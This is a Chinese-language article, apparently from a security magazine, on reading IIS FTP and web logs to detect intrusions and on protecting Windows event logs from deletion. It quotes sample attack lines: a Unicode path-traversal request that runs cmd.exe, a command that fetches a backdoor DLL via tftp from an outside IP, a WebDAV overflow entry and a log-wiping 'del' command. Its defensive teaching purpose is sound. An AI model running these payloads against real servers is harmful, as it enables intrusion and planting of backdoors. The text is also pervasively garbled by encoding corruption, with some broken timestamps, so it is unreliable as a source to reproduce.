|
如今各式各樣的Windows漏洞層出不窮�,五花八門的入侵工具更是令人眼花繚亂,稍微懂點(diǎn)網(wǎng)絡(luò)知識(shí)的人都可以利用各種入侵工具進(jìn)行入侵�,這可給我們的網(wǎng)管帶來了很大的麻煩,雖然經(jīng)過精心配置的服務(wù)器可以抵御大部分入侵���,但隨著不斷新出的漏洞����,再高明的網(wǎng)管也不敢保證一臺(tái)務(wù)器長(zhǎng)時(shí)間不會(huì)被侵入,所以��,安全配置服務(wù)器并不能永遠(yuǎn)阻止黑客入侵���,而如何檢測(cè)入侵者行動(dòng)以保證服務(wù)器安全性就在這樣的情況下顯得非常重要����。
日志文件作為微軟Windows系列操作系統(tǒng)中的一個(gè)特殊文件�����,在安全方面具有無可替代的價(jià)值���。它每天為我們忠實(shí)地記錄下系統(tǒng)所發(fā)生一切事件����,利用它可以使系統(tǒng)管理員快速對(duì)潛在的系統(tǒng)入侵作出記錄和預(yù)測(cè)����,但遺憾的是目前絕大多數(shù)的人都忽略了它的存在,反而是因?yàn)楹诳蛡児馀R才會(huì)使我們想起這個(gè)重要的系統(tǒng)日志文件���,很有諷刺意味���。
在這里我們就不去講什么日志文件的默認(rèn)位置�����、常見備份方法等基本技巧了���,這樣的東西黑防以前講得很清楚了����,大家可以翻看黑防以前的雜志學(xué)習(xí)這些東西,我們今天來看看如何分析常見的日志文件吧�!
1.FTP日志分析
FTP日志和WWW日志在默認(rèn)情況下,每天生成一個(gè)日志文件�,包含了該日的一切記錄,文件名通常為ex(年份)(月份)(日期)���。例如ex040419��,就是2004年4月19日產(chǎn)生的日志��,用記事本可直接打開�,普通的有入侵行為的日志一般是這樣的:
#Software: Microsoft Internet Information Services 5.0(微軟IIS5.0)
#Version: 1.0 (版本1.0)
#Date: 20040419 0315 (服務(wù)啟動(dòng)時(shí)間日期)
#Fields: time cip csmethod csuristem scstatus
0315 127.0.0.1 [1]USER administator 331(IP地址為127.0.0.1用戶名為administator試圖登錄)
0318 127.0.0.1 [1]PASS – 530(登錄失敗)
032:04 127.0.0.1 [1]USER nt 331(IP地址為127.0.0.1用戶名為nt的用戶試圖登錄)
032:06 127.0.0.1 [1]PASS – 530(登錄失?����。?
032:09 127.0.0.1 [1]USER cyz 331(IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄)
0322 127.0.0.1 [1]PASS – 530(登錄失?。?
0322 127.0.0.1 [1]USER administrator 331(IP地址為127.0.0.1用戶名為administrator試圖登錄)
0324 127.0.0.1 [1]PASS – 230(登錄成功)
0321 127.0.0.1 [1]MKD nt 550(新建目錄失敗)
0325 127.0.0.1 [1]QUIT – 550(退出FTP程序)
從日志里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統(tǒng)�,換了四次用戶名和密碼才成功,管理員立即就可以得知這個(gè)IP至少有入侵企圖�����!而他的入侵時(shí)間�����、IP地址以及探測(cè)的用戶名都很清楚的記錄在日志上�。如上例入侵者最終是用Administrator用戶名進(jìn)入的,那么就要考慮此用戶名是不是密碼失竊�?還是被別人利用?接下來就要想想系統(tǒng)出什么問題了���。
2.WWW日志分析
WWW服務(wù)同F(xiàn)TP服務(wù)一樣�,產(chǎn)生的日志也是在%systemroot%sys tem32LogFilesW3SVC1目錄下,默認(rèn)是每天一個(gè)日志文件�。這里需要特別說明一下,因?yàn)閃eb的日志和其他日志不同���,它的分析要細(xì)致得多��,需要管理員有豐富的入侵����、防護(hù)知識(shí)����,并且要足夠的細(xì)心,不然�����,很容易遺漏那種很簡(jiǎn)單的日志��,而通常這樣的日志又是非常關(guān)鍵的��。由于我們不可能一個(gè)一個(gè)分析�����,所以這里舉個(gè)簡(jiǎn)單例子:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
通過分析第六行��,可以看出2004年5月19日���,IP地址為192.168.1.26的用戶通過訪問IP地址為192.168.1.37機(jī)器的80端口���,查看了一個(gè)頁(yè)面iisstart.asp,這位用戶的瀏覽器為compatible; MSIE 5.0; Windows 98 DigExt�,有經(jīng)驗(yàn)的管理員就可通過安全日志、FTP日志和WWW日志來確定入侵者的IP地址以及入侵時(shí)間��。
對(duì)現(xiàn)在非常常見的SQL注入式攻擊��,通過對(duì)put�、get的檢查,也可以大概判斷是那個(gè)頁(yè)面出了問題���,從而修補(bǔ)����。
3.HTTPD事務(wù)日志的分析
Microsoft的IIS 5自公布到現(xiàn)在�,被黑客利用的漏洞多不勝數(shù),像.ida/.idq����、unicode�、WebDavx3和一些未知的漏洞����,我們分析日志的目的就是為了分析黑客入侵的行為,對(duì)于沒有打好補(bǔ)丁包的系統(tǒng)被黑客成功入侵的日志記錄分別對(duì)應(yīng)如下�。為了給大家介紹一個(gè)比較醒目的介紹,專門配置了個(gè)“古老”的服務(wù)器�,用舊漏洞給大家做個(gè)演示,很容易觸類旁通就懂其它了����。
(1)unicode漏洞入侵日志記錄
這個(gè)是個(gè)非常經(jīng)典的漏洞了��,要找這樣的服務(wù)器估計(jì)得去國(guó)外慢慢找了���,但是因?yàn)樗娜罩臼亲罱?jīng)典的一個(gè),所以我們這里特別拿它來做個(gè)示范�。
我們打開IIS5的Web服務(wù)的日志文件,日志文件默認(rèn)位置在%systemroot%system32LogFiles文件夾下,如圖1所示是一個(gè)典型的Unicode漏洞入侵行為的日志記錄�,對(duì)于正常的Web訪問,是通過80端口用GET命令獲取Web數(shù)據(jù)�����,但通過非法的字符編碼可繞過字符驗(yàn)證而得到不應(yīng)該得到的信息。但補(bǔ)上相應(yīng)的補(bǔ)丁可堵上此漏洞�。如圖一所示。
我們配合入侵來看下這樣的記錄:通過下面的編碼我們?cè)谌肭值臅r(shí)候可以查看目標(biāo)機(jī)的目錄文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c dir 200
則日志中會(huì)記錄下此訪問行為:
2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c dir 200 -
看到了嗎�?我們的日志中記錄地一清二楚,來自192.168.0.1的攻擊者查看我們的目錄�。下面一行是向我們的機(jī)器傳送后門程序的日志記錄:
2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll
502 –
看到了吧?記錄非常詳細(xì)的��,系統(tǒng)里面那個(gè)程序在響應(yīng)都記錄了下來�����,這樣我們分析入侵行為就好辦了�����。
?����。?)WebDavx3遠(yuǎn)程溢出日志記錄
過去一段時(shí)間有名的Wevdavx3漏洞是應(yīng)用最廣泛的�,如果系統(tǒng)遭受了此遠(yuǎn)程溢出的攻擊行為,則日志記錄如圖二所示��。
2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
這表示我們的Web服務(wù)受到了來自192.168.0.218的攻擊,并鎖定(即關(guān)閉)了WEB服務(wù)�,后面的一些亂碼字符是在溢出攻擊時(shí)使用的偏移位猜過程。
上面的幾種日雜都記錄了有入侵行為的IP地址�����,但此IP地址說不定就是攻擊者使用了跳板�,也就是說此IP很可能是“肉雞”而不是攻擊者的IP,遇到這樣的情況��,我們?cè)俨榭雌渌罩疚募?���,還是有可能追查出攻擊者的位置的,但這個(gè)就完全靠管理員的經(jīng)驗(yàn)了���。
4.日志文件的移位保護(hù)
通過上面的幾個(gè)方法�����,大家應(yīng)該可以檢測(cè)普通的系統(tǒng)攻擊了��,但話說回來�����,如果上面的攻擊任何一個(gè)成功了���,那現(xiàn)在我們都看不到日志了,早被入侵者清空了��,所以���,為了防患于未然�����,我們還是針對(duì)常見的刪除日志的方法�,把日志挪挪吧���。
好多文章介紹對(duì)事件日志移位能做到對(duì)系統(tǒng)系統(tǒng)很好的保護(hù)��,移位雖是一種保護(hù)方法�,但只要在命令行輸入dir c:*.evt/s���,一下就可查找到事件日志位置���,再刪除可容易了�����,那怎么辦呢�?其實(shí)日志移位要通過修改注冊(cè)表來完成�,找到注冊(cè)表HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog下面的Application、Security�、System幾個(gè)子鍵,分別對(duì)應(yīng)“應(yīng)用程序日志”����、“安全日志”、“系統(tǒng)日志”��。如何修改呢���?下面我們具體來看看Application子鍵:File項(xiàng)就是“應(yīng)用程序日志”文件存放的位置��,把此鍵值改為要存放日志文件的文件夾�,我們?cè)侔?systemroot%system32configappevent.evt文件拷貝到此文件夾��,再重啟機(jī)器就可以了�。
在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性,如果不移位也無法對(duì)文件進(jìn)行安全設(shè)置操作,右擊移位后的“文件夾選擇屬性”��,進(jìn)入“安全”選項(xiàng)卡����,不選擇“允許將來自父系的可繼承權(quán)限傳播給該對(duì)象”�,添加“System”組,分別給Everyone組“讀取”權(quán)限����,System組選擇除“完全控制”和“修改”的權(quán)限。然后再將系統(tǒng)默認(rèn)的日志文件512KB大小改為你所想要的大小��,如20MB�����。進(jìn)行了上面的設(shè)置后���,直接通過Del C:*.Evt/s/q來刪除是刪不掉的�,相對(duì)要安全很多了����。
通過上面的幾個(gè)實(shí)際的例子,相信大家都應(yīng)該具備分析普通入侵日志的能力了,再結(jié)合一定的實(shí)際經(jīng)驗(yàn)��,通過日志來發(fā)現(xiàn)系統(tǒng)漏洞����、追蹤入侵者就簡(jiǎn)單很多了。希望此文能拋磚引玉����,給大家?guī)硪恍椭?/p>
|
